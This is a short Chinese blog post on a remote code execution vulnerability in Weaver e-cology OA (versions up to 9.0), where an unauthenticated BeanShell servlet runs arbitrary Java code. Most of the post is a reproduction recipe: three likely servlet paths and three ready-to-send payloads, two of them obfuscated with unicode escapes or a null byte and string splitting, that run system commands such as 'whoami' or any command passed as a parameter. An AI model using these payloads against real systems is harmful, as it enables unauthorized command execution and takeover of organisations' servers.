美文网首页
泛微e-cology OA 远程代码执行漏洞

泛微e-cology OA 远程代码执行漏洞

作者: ffx_01 | 来源:发表于2020-02-09 16:16 被阅读0次

    0x00 漏洞原理

    该漏洞位于 e-cology OA系统BeanShell组件中,并且该组件允许未授权访问,攻击者可通过访问该组件执行任意的Java代码,导致远程命令执行。

    0x01影响版本

    泛微 e-cology<=9.0

    0x02复现

    可能的路径

    /weaver/bsh.servlet.BshServlet
    /weaveroa/bsh.servlet.BshServlet
    /oa/bsh.servlet.BshServlet
    

    payload:

    bsh.script=exec("whoami");&bsh.servlet.output=raw
    bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
    bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami
    
    image.png image.png

    0x03参考

    https://github.com/myzing00/Vulnerability-analysis/tree/master/0917/weaver-oa/CNVD-2019-32204

    相关文章

      网友评论

          本文标题:泛微e-cology OA 远程代码执行漏洞

          本文链接:https://www.haomeiwen.com/subject/zcqnxhtx.html